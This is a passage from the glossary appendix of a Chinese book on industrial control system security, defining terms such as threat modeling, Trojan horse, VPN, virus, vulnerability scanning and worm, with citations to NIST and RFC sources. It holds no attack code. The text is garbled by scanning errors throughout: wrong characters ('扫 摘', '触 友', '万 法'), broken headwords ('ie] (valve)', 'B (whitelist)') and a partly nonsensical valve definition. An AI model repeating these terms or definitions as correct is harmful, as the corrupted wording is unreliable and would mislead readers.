威胁 评估 (threat assessment) ”按照 一 定 流程 对 信息 系统 或 企业 构成 威胁 的 程度 进行 评估 ， 并 揭示 威胁 本 质 的 过 程 。 (来 源 : NIST SP800-30) 
威胁 事件 (threat event) ”可 能 导致 不 良 后 果 或 影响 的 事件 或 情况 。 (来 源 : NIST SP800-30) 


威胁 建 模 (threat modeling) 1) 通过 目标 与 脆弱 性 识别 对 网 络 安全 进行 优化 并 确定 工作 方向 ， 然 后 拟 制 对 抗 措施 以 防止 、 削 弱 威 胁 对 系统 影响 的 过 程 。 
(来 源 : http://searchsecurity.techtarget.com/definition/threat-modeling) 


2) 威胁 建 模 是 一 种 对 特定 逻辑 实体 攻击 和 防御 方面 进行 建 模 的 风险 评估 形式 ， 其 中 逻辑 实体 包括 数据 、 应 用 程序 、 主 机 、 系 统 或 环境 等 等 。 威 胁 建 模 的 基本 
原理 在 于 安全 保障 所 能 使 用 的 资源 总 是 有 限 的 ， 因 此 有 必要 确定 如 何 有 效 地 使 用 有 限 的 资源 。 (来 源 : NIST SP800-154 草 案 ) 


威胁 场景 (threat scenario) 参见 风险 方案 。 


威胁 源 (threat source) 意 对 某 一 漏洞 进行 利用 的 某 种 意图 和 方法 ， 或 者 可 能 意外 触发 漏 洞 的 某 种 情况 和 方法 。 与 威胁 代理 (threat agent) 同 义 。 
(来 源 : FIPS200; SP800-53; SP800-53A; SP800-37) 


传输 控制 协议 (Transmission Control Protocol, TCP) ”TCP 是 TCP/IP 网 络 中 的 主要 协议 之 一 。 而 IP 协 议 只 处 理 数据 包 ，TCP 则 能 够 建立 两 台 主 机 之 间 的 
连接 并 进行 数据 交换 。TCP 保 证 数据 的 传输 ， 并 且 还 能 够 保证 数据 包 以 发 送 顺 序 进 行 传输 。 (来 源 : API1164) 


特洛伊 木马 (Trojan Horse) “表面 上 看 起 来 功能 正常 ， 但 具有 隐藏 的 恶意 功能 以 规避 安全 机 制 的 计算 机 程序 ， 有 时 还 会 利用 调用 程序 的 系统 实体 的 合法 授 
权 来 规避 检测 。 (来 源 : RFC4949) 


未 授权 访问 (unauthorized access) ”在 没有 网络 、 系 统 、 应 用 程序 、 数 据 或 其 他 资源 访问 权限 的 情况 下 获取 逻辑 或 者 物理 层面 上 的 访问 权 。 (来 源 : 
NIST SP800-61) 


单 向 网 关 (unidirectional gateway) ， 单 向 网 关 是 软 硬 件 相 结合 的 设备 。 其 中 硬件 允许 数据 从 一 个 网 络 传输 到 另 一 个 网 络 ， 但 是 不 能 将 任何 信息 发 送 回 起 
始 网 络 。 而 软件 则 可 以 复制 数据 库 ， 并 对 协议 服务 器 和 设备 进行 仿真 。 (来 源 : NIST SP800-82) 


ie] (valve) ” 液 流 系统 中 的 内 许 六 置 ， 可 以 中 断 流动 过 程 、 调 节 流 量 或 者 将 流体 转移 到 系统 中 的 另 一 分 支 。 (来 源 : 上 自动化、 系统 和 仪器 字典 ) 


变频 驱动 器 (Variable Frequency Drive, VFD) ”通过 改变 非 伺 服 交 流 电 动机 的 电流 频率 来 控制 非 伺 服 交 流 电 动机 的 速度 ， 而 非 精 确定 位 的 一 种 驱动 器 类 
型 。VFD 通 常用 于 速度 和 功率 很 重要 但 精确 定位 重要 程度 不 高 的 应 用 。 (来 源 : NIST IR6859) 


版 本 扫 摘 (version scanning) ”识别 当前 使 用 的 服务 应 用 版 本 和 应 用 程序 版 本 的 过 程 。 (来 源 : NIST SP800-115) 
虚拟 机 (Virtual Machine, VM) ”人 允许 单 台 主机 运行 一 个 或 多 个 客户 机 操作 系统 的 软件 。 (来 源 : NIST SP800-115) 


虚拟 专用 网 络 (Virtual Private Network, VPN) ”由 公共 的 、 客 观 存 在 的 ( 即 真 实 的 ) 网 络 (如 互联 网 ) 中 的 系统 资源 构建 而 成 的 使 用 受 限 、 逻 辑 上 的 
( 即 人 工 的 或 模拟 的 ) 计算 机 网 络 ， 通 常用 到 了 加 密 机 制 ( 位 于 主机 或 网 关内 部 ) ， 并 且 通 常 虚 拟 网 络 会 借助 隧道 连接 穿 过 真实 网 络 。 (来 源 : RFC4949) 


病毒 (virus) ”具有 隐藏 功能 、 能 够 实现 自我 复制 ， 通 过 感染 另 一 程序 (即将 其 自身 的 副本 插入 另 一 程序 并 成 为 其 一 部 分 ) 进行 传播 的 计算 机 软件 ， 通 剃 具 
有 恶意 功能 。 病 毒 不 能 独立 运行 ， 只 有 人 在 宿 主 程序 运行 的 情况 下 才能 触 友 病毒 。 (来 源 : RFC4949) 


病毒 定义 (virus definitions) ” 反 病 毒 检测 算法 所 使 用 的 已 知 恶 意 软件 的 预定 义 特征 值 。 (来 源 : NIST SP800-82) 


漏洞 (vulnerability) ”信息 系统 、 系 统 安 全 程序 、 内 部 控制 或 实施 过 程 中 的 可 能 被 威胁 源 利用 或 触 皮 的 弱点 。 (来 源 : NIST SP800-53; NIST SP800- 
115) 


脆弱 性 评估 (vulnerability assessment) ”系统 或 产品 中 的 脆弱 性 进行 系统 性 分 析 ， 以 及 识别 、 量 化 、 优 先 级 排序 (或 评分 ) 的 过 程 ， 从 而 确定 安全 措施 的 
充裕 性 、 识 别 安全 缺陷 、 为 预测 安全 措施 的 有 效 性 提供 数据 ， 以 及 确认 措施 实施 后 的 充裕 性 。 (来 源 : NIST SP800-30， 改 版 ) 


脆弱 性 扫 摘 (vulnerability scanning) “识别 主机 或 主机 属性 及 其 相关 脆弱 性 的 技术 。 (来 源 : NIST SP800-115) 


脆弱 性 验证 (vulnerability validation) ”验证 脆弱 性 是 否 存 在 的 主动 信息 安全 测试 技术 ， 其 中 包括 口令 破解 、 远 程 访问 测试 、 渗 透 测试 、 社 会 工程 以 及 物理 
安全 测试 等 。 (来 源 : NIST SP800-115) 


B (whitelist) ”功能 正常 并 被 批准 在 机 构 以 及 (或 者 ) 信息 系统 中 使 用 的 实体 列表 ， 例 如 主机 或 应 用 程序 。 (来 源 : NIST SP800-128) 


广域网 (Wide Area Network, WAN) ”向 大 量 独立 用 户 提 供 数据 通信 服务 的 物理 或 逻辑 网 络 ， 而 非 由 局 域 网 (LAN) 提供 服务 。 同 时 ， 与 局 域 网 相 比 ， 


其 分 布 的 地 理 范 围 更 大 。 (来 源 : API1164) 


无 线 设 备 (wireless device) ”可 以 通过 无 线 电 或 红外 连接 到 工控 网 络 的 所 有 设备 ， 通 常用 于 收集 或 监视 数据 ， 但 在 某 些 情况 下 也 可 以 修改 控制 设 定点 。 
(来 源 : NIST SP800-82) 


工作 由 (workstation) ”承担 编程 、 工 程 以 及 设计 等 任务 的 计算 机 。 (来 源 : NIST IR6859) 


蠕虫 (worm) ”可 以 独立 运行 的 计算 机 程序 ， 该 程序 可 以 将 自己 完整 地 传播 到 网 络 上 的 其 他 主机 中 ， 并 且 可 能 会 大 量 地 消耗 计算 机 资源 。 (来 源 : 
RFC4949) 


附录 C ”工业 控制 系统 风险 评估 与 渗透 测试 万 法 流程 图 


本 附录 展示 了 相关 的 流程 图 和 图 表 ， 帮 助 读 者 了 解 整个 风险 评估 过 程 ， 以 及 脆弱 性 评估 与 渗透 测试 方法 。 
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